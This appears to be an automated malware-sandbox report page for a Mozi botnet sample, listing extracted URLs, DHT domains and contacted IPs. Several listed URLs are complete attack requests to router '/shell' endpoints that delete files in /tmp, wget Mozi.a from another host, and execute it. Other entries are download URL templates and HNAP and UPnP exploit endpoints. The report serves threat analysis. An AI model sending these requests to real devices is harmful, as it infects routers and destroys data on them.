http://24.239.192.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

24.239.192.38

http://23.217.12.208:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

23.217.12.208

http://23.236.242.26:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

23.236.242.26

http://113.161.185.44:80/HNAP1/

113.161.185.44

http://74.79.213.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

74.79.213.38

http://pastebin.ca)

unknown

http://%s:%d/Mozi.a;chmod

unknown

http://schemas.xmlsoap.org/soap/encoding/

unknown

http://%s:%d/Mozi.m;$

unknown

http://schemas.xmlsoap.org/soap/envelope/

unknown

http://127.0.0.1

unknown

http://baidu.com/%s/%s/%d/%s/%s/%s/%s)

unknown

http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/

unknown

http://www.alsa-project.org

unknown

http://www.pastebin.ca/upload.php

unknown

http://%s:%d/Mozi.m

unknown

http://www.alsa-project.org/cardinfo-db/

unknown

http://127.0.0.1sendcmd

unknown

http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY

unknown

http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah

unknown

http://ipinfo.io/ip

unknown

http://%s:%d/Mozi.m;/tmp/Mozi.m

unknown

http://www.pastebin.ca

unknown

http://purenetworks.com/HNAP1/

unknown

http://72.200.237.136:49152/soap.cgi?service=WANIPConn1

72.200.237.136

http://www.alsa-project.org/alsa-info.sh

unknown

http://%s:%d/Mozi.m;

unknown

http://www.alsa-project.org.

unknown

http://HTTP/1.1

unknown

http://190.189.194.46:49152/soap.cgi?service=WANIPConn1

190.189.194.46

http://%s:%d/Mozi.a;sh$

unknown

http://www.pastebin.ca.

unknown

http://schemas.xmlsoap.org/soap/envelope//

unknown

There are 36 hidden URLs, click here to show them.

Domains

Name

Malicious

dht.transmissionbt.com

212.129.33.59

Details

Name:	dht.transmissionbt.com
IP:	212.129.33.59
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking,	Application Layer Protocol Non-Application Layer Protocol

bttracker.acc.umu.se

130.239.18.159

router.bittorrent.com

67.215.246.10

router.utorrent.com

82.221.103.244

bttracker.debian.org

unknown

IPs

Domain

Country

Active

Malicious

74.7.13.10

unknown

United States

unknown

171.221.181.48

unknown

China

unknown

178.72.69.126

unknown

Russian Federation

unknown

84.50.142.113

unknown

Estonia

unknown

26.109.230.217

unknown

United States

unknown

22.142.197.254

unknown

United States

unknown

44.209.53.252

unknown

United States

unknown

29.31.10.222

unknown

United States

unknown

158.180.15.87

unknown

United Kingdom

unknown

11.242.227.131

unknown

United States

unknown

26.220.204.225

unknown

United States

unknown

93.102.56.19

unknown

Portugal

unknown

187.158.144.73

unknown

Mexico

unknown

42.53.76.236

unknown

China

unknown

56.182.70.51

unknown

United States

unknown

154.3.17.209

unknown

United States

unknown

41.91.67.149

unknown

Egypt

unknown

180.254.89.180

unknown

Indonesia

unknown

118.241.245.41

unknown

Japan

unknown

19.214.106.48

unknown

United States

unknown

26.254.247.139

unknown

United States

unknown

93.178.240.65

unknown

Ukraine

unknown

133.214.150.254

unknown

Japan

unknown

44.17.143.194

unknown

United States

unknown

113.153.230.119

unknown

Japan

unknown

89.157.51.131

unknown

France

unknown

189.241.241.142

unknown

Mexico

unknown

124.57.147.225

unknown

Korea Republic of

unknown

69.20.178.197

unknown

United States

unknown

81.176.95.215

unknown

Russian Federation

unknown

66.221.30.106

unknown

United States

unknown

109.143.31.175

unknown

Belgium

unknown

9.14.171.53

unknown

United States

unknown

16.0.53.131

unknown

United States

unknown

172.195.124.44

unknown

Australia

unknown

21.245.113.206

unknown

United States

unknown

86.245.98.172

unknown

France

unknown

78.101.119.242

unknown

Qatar

unknown

94.185.237.35

unknown

United Kingdom

unknown

102.37.69.46

unknown

South Africa

unknown

68.238.109.13

unknown

United States

unknown

21.176.167.107

unknown

United States

unknown

106.63.191.143

unknown

China

unknown

144.57.215.199

unknown

Sweden

unknown

84.230.234.235

unknown

Finland

unknown

126.172.220.14

unknown

Japan

unknown

174.231.155.97

unknown

United States

unknown

122.128.194.105

unknown

Korea Republic of

unknown

111.169.102.97

unknown

Japan

unknown

51.190.88.233

unknown

United Kingdom

unknown

1.71.162.33

unknown

China

unknown

173.153.15.142

unknown

United States

unknown

157.39.16.40

unknown

India

unknown

80.254.91.193

unknown

Malta

unknown

35.210.136.245

unknown

United States

unknown

89.89.90.95

unknown

France

unknown

152.118.36.40

unknown

Indonesia

unknown

222.46.68.216

unknown

China

unknown

26.31.214.72

unknown

United States

unknown

203.252.111.5

unknown

Korea Republic of

unknown

55.44.238.153

unknown

United States

unknown

7.200.67.208

unknown

United States

unknown

44.60.150.38

unknown

United States

unknown

207.23.25.29

unknown

Canada

unknown

91.117.98.122

unknown

Spain

unknown

125.31.207.97

unknown

China

unknown

82.253.85.237

unknown

France

unknown

41.232.91.226

unknown

Egypt

unknown

171.198.145.203

unknown

United States

unknown

185.68.99.43

unknown

Netherlands

unknown

113.113.18.44

unknown

China

unknown

104.174.200.127

unknown

United States

unknown

81.179.119.252

unknown

United Kingdom

unknown

175.159.53.19

unknown

Hong Kong

unknown

13.92.116.235

unknown

United States

unknown

94.178.218.143

unknown

Ukraine

unknown

184.216.173.25

unknown

United States

unknown

171.159.91.232

unknown

United States

unknown

189.222.218.142

unknown

Mexico

unknown

152.125.208.240

unknown

United States

unknown

97.70.224.8

unknown

United States

unknown

209.232.145.19

unknown

United States

unknown

153.38.105.79

unknown

United States

unknown

177.115.79.211

unknown

Brazil

unknown

153.48.151.95

unknown

United States

unknown

215.164.157.85

unknown

United States

unknown

134.35.254.248

unknown

Yemen

unknown

117.83.171.37

unknown

China

unknown

82.129.200.140

unknown

Egypt

unknown

161.118.201.239

unknown

Japan

unknown

42.55.27.34

unknown

China

unknown

148.132.232.29

unknown

United States

unknown

17.73.154.133

unknown

United States

unknown

51.74.229.172

unknown

United States

unknown

90.178.36.52

unknown

Czech Republic

unknown

158.119.251.77

unknown

United Kingdom

unknown

172.101.9.198

unknown

United States

unknown

173.63.104.87

unknown

United States

unknown

113.24.165.118

unknown

China

unknown

184.253.253.190

unknown

United States

unknown

There are 90 hidden IPs, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOCReport

Files

Processes

URLs

Domains

IPs